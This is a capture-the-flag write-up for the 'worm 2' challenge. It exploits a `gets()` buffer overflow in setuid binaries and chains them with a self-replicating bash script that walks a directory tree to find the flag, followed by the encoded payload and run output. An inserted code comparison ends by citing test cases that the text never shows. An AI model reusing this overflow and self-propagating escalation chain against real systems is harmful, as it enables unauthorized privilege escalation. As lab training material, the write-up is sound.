# worm 2

> Note: The original challenge had an unintended solution, so this is the  
> patched version

Write a worm and pwn my system :)

```  
nc 35.188.197.160 1002  
```

Attachments: `worm2.zip`

## Overview

After connecting to the server, we see this:

```  
$ nc 35.188.197.160 1002  
Send the output of: hashcash -mb26 5qB3LV9O/rHt8dQ9  
1:26:210613:5qb3lv9o/rht8dq9::obR0I0xtrnii7Z7N:3fgTk  
warning: commands will be executed using /bin/sh  
job 153 at Sun Jun 13 18:27:00 2021  
Creating network "64d81a00b78f2c0d0e179a8992e2057b_default" with the default driver  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ...  
Creating 64d81a00b78f2c0d0e179a8992e2057b_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
```

On the remote server, we only get to execute one command, non-interactively.
You can set up the challenge locally to test, though.

We start off as `user1` in the root directory.  
If we `cd` to `/room0`, we see:  
```sh  
user1@14f2437dee35:/room0$ ls -lah  
total 36K  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 .  
drwxr-xr-x 1 root  root  4.0K May 15 01:26 ..  
-r-sr-x--- 1 user2 user1  17K May 15 01:26 key  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 room1  
```

If we try `cd room0` or `cd room1`, we get `Permission denied`. Luckily, the  
`key` executable is owned by `user2` and has the `setuid` bit set. Running  
`./key`, we get:

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: idk  
Unauthorized :(  
```

Here's the relevant code from `key.c`:  
```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* ID is the uid/gid of the next user; it is not defined in this excerpt but
   set per key at compile time (the "Compiling key N" lines in the banner). */
typedef struct {
    char name[32];      /* filled by gets(): no length limit */
    char password[32];  /* sits directly after name in memory */
} User;

void auth() {
    printf("Authenticating ...\n");
    assert(setuid(ID) == 0);
    assert(setgid(ID) == 0);
    system("/bin/bash");  /* the shell inherits key's stdin */
}

int main() {
    User user;

    printf("Name: ");
    gets(user.name);  /* anything past 31 bytes spills into user.password */

    /* the password is never read from the user; only 8 bytes are compared */
    if (strncmp(user.password, "p4ssw0rd", 8) == 0) {
        auth();
    } else {
        printf("Unauthorized :(\n");
    }
    return 0;
}
```

There's clearly a BOF at `gets(user.name)`: `gets` has no length limit and
`password` sits directly after `name` in the struct, so 32 bytes of padding
followed by `p4ssw0rd` overflow into `user.password`. The program never
prompts for a password at all, and `strncmp` only compares the first 8 bytes
of whatever ends up in that field.

```sh  
user1@14f2437dee35:/room0$ ./key  
Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd  
Authenticating ...  
user2@14f2437dee35:/room0$ id  
uid=1001(user2) gid=1001(user2) groups=1001(user2),1000(user1)  
```
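An added example, not the challenge's own `key.c`: a model of the original check beside a bounded version of the same logic, so the same input can be seen to pass one and fail the other. `key_original` and `key_bounded` are names chosen here, and the model caps its copy at the struct size only to keep the demonstration itself in bounds (the real binary has no cap).

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    char name[32];
    char password[32];
} User;

/* Model of the challenge's check: gets() copies the whole line into name
 * with no bound, so bytes 32 onward land in the adjacent password field.
 * The copy is capped at sizeof(User) here purely so the model stays in
 * bounds; it reproduces the layout effect, not gets() itself. */
bool key_original(const char *line) {
    User user;
    memset(&user, 0, sizeof user);        /* the real binary leaves this uninitialised */
    size_t n = strlen(line);
    if (n > sizeof user - 1)
        n = sizeof user - 1;
    memcpy((char *)&user, line, n);       /* what gets(user.name) does to the struct */
    /* No password is ever read; only an 8-byte prefix of the field is compared. */
    return strncmp(user.password, "p4ssw0rd", 8) == 0;
}

/* Bounded form: the name is truncated to what fits, the password is read
 * as its own field, and the whole string is compared, not an 8-byte prefix. */
bool key_bounded(const char *name_line, const char *password_line) {
    User user;
    memset(&user, 0, sizeof user);
    snprintf(user.name, sizeof user.name, "%s", name_line);
    snprintf(user.password, sizeof user.password, "%s", password_line);
    return strcmp(user.password, "p4ssw0rd") == 0;
}

/* Stand-alone use: feed the same two lines to both checks. */
int main(void) {
    char name[256] = "", pw[256] = "";
    if (fgets(name, sizeof name, stdin)) name[strcspn(name, "\n")] = '\0';
    if (fgets(pw, sizeof pw, stdin)) pw[strcspn(pw, "\n")] = '\0';
    printf("original: %s\n", key_original(name) ? "Authenticating" : "Unauthorized");
    printf("bounded:  %s\n", key_bounded(name, pw) ? "Authenticating" : "Unauthorized");
    return 0;
}
```

The 31-byte padding case in the test shows the offset has to be exact, and the `p4ssw0rdXYZ` case shows why comparing only 8 bytes is its own weakness.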

Now we're `user2` and can `cd` to `room0` or `room1`. In `/room0/room1`, we
see nearly the exact same thing:  
```sh  
user2@14f2437dee35:/room0/room1$ ls -lah  
total 36K  
dr-xr-x--- 4 user2 user3 4.0K May 15 01:26 .  
dr-xr-x--- 4 user1 user2 4.0K May 15 01:26 ..  
-r-sr-x--- 1 user3 user2  17K May 15 01:26 key  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room0  
dr-xr-x--- 4 user3 user4 4.0K May 15 01:26 room1  
```

Again if we try to `cd room0` or `cd room1`, we get `Permission denied`, so we  
have to use the `key`.

We know that `MAX_DEPTH = 10`, so the directory structure forms a full binary  
tree (the 1023 nodes from the banner), and the flag is moved into a random leaf node:  
```python
import os
import random

def plant_flag():
    # Start at the root of the tree and walk down until a directory with no children
    os.chdir("room0")
    while len(os.listdir()) > 0:
        os.chdir(f"room{random.randint(0, 1)}")

    # Move the flag into the chosen leaf
    os.rename("/flag.txt", "./flag.txt")
```

Finally, our entire exploit must fit in 512 characters (external networking is  
disabled, so we can't download any additional payloads). Note the `0<&-`: the  
launcher closes stdin before running our command, so the command itself cannot  
read any further input from the connection:  
```bash  
echo "[*] You now have a shell!"  
echo "[*] Please enter your exploit below (max 512 chars):"  
read -n 512 cmd  
exec su user1 -c "$cmd" 0<&-  
```

## Solution

Do a depth-first search with a self-replicating exploit. The script below is  
dropped at `/tmp/solve.sh` (sent gzipped and base64-encoded to fit the 512-character  
limit, as the client output shows). In each room, `./key` reads the overflow payload  
as the name, and the `/bin/bash` it spawns as the next user then reads the following  
line from the same pipe, which `cd`s into a child room and re-runs the script:  
```bash
# Runs as /tmp/solve.sh in every room; prints one dot per node visited
echo -n . 1>&2

# Leaf containing the flag
if [ -f "flag.txt" ]; then
    cat flag.txt 1>&2
fi

# Inner node: use the setuid key to become the next user and recurse into both children
if [ -f "key" ]; then
    payload=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp4ssw0rd
    # line 1 is consumed by gets(); line 2 is read by the bash that key spawns
    (echo $payload && echo "cd room0 && exec bash /tmp/solve.sh") | ./key > /dev/null
    (echo $payload && echo "cd room1 && exec bash /tmp/solve.sh") | ./key > /dev/null
fi
```

Output:  
```sh  
$ python3 client.py  
[x] Opening connection to localhost on port 1024  
[x] Opening connection to localhost on port 1024: Trying 127.0.0.1  
[+] Opening connection to localhost on port 1024: Done  
[*] Solving PoW ...  
[DEBUG] Received 0x34 bytes:  
   b'Send the output of: hashcash -mb26 ehmCMcCi7SHUqWes\n'  
[+] Solved PoW  
[DEBUG] Sent 0x35 bytes:  
   b'1:26:210515:ehmcmcci7shuqwes::FmB8btNpTIqC54om:2Bd/y\n'  
[DEBUG] Sent 0x150 bytes:  
   b'cd /tmp && echo -n H4sIAAwmn2AC/5WPTQrCMBSE9z3FEKTookkr7sSC5xAXMT+mmCalibUFD2+tCrpSZznvfcOMEsYjc6AoynSZJJXGDpkG0ZYfaewjwX6NaJRLMErwiNflQejqDTqp4fO/4YP1XG62X9SsQrjkrZygubqXmj1ZpCkmgwiJ1vs6n5xeCRx4MGCxbljwtlM0GLLAFZSNPVCCSdUxd7b2l9Ti/9Rx+g33VaPsPwEAAA== | base64 -d > solve.sh.gz && gzip -d solve.sh.gz && cd /room0 && bash /tmp/solve.sh\n'  
[*] Switching to interactive mode  
warning: commands will be executed using /bin/sh  
job 20 at Sat May 15 01:44:00 2021  
Creating network "9a97ccccc44d5152637380a682ac72ea_default" with the default driver  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ...  
Creating 9a97ccccc44d5152637380a682ac72ea_app_run ... done  
Adding group `user1' (GID 1000) ...  
Done.  
Adding group `user2' (GID 1001) ...  
Done.  
Adding group `user3' (GID 1002) ...  
Done.  
Adding group `user4' (GID 1003) ...  
Done.  
Adding group `user5' (GID 1004) ...  
Done.  
Adding group `user6' (GID 1005) ...  
Done.  
Adding group `user7' (GID 1006) ...  
Done.  
Adding group `user8' (GID 1007) ...  
Done.  
Adding group `user9' (GID 1008) ...  
Done.  
Adding group `user10' (GID 1009) ...  
Done.  
[*] Compiling key 2 ...  
[*] Done  
[*] Compiling key 3 ...  
[*] Done  
[*] Compiling key 4 ...  
[*] Done  
[*] Compiling key 5 ...  
[*] Done  
[*] Compiling key 6 ...  
[*] Done  
[*] Compiling key 7 ...  
[*] Done  
[*] Compiling key 8 ...  
[*] Done  
[*] Compiling key 9 ...  
[*] Done  
[*] Compiling key 10 ...  
[*] Done  
[*] Building tree with 1023 nodes ...  
[*] Planting flag in a random leaf node ...  
[+] Ready  
[*] You now have a shell!  
[*] Please enter your exploit below (max 512 chars):  
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................CCC{I_c4nt_b3l1ev3_1_f0rg0t_t0_cl0s3_std1n}  
.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[*]
Got EOF while reading in interactive  
```  

Original writeup
(https://github.com/qxxxb/ctf_challenges/blob/master/2021/ccc/pwn/worm2/solve).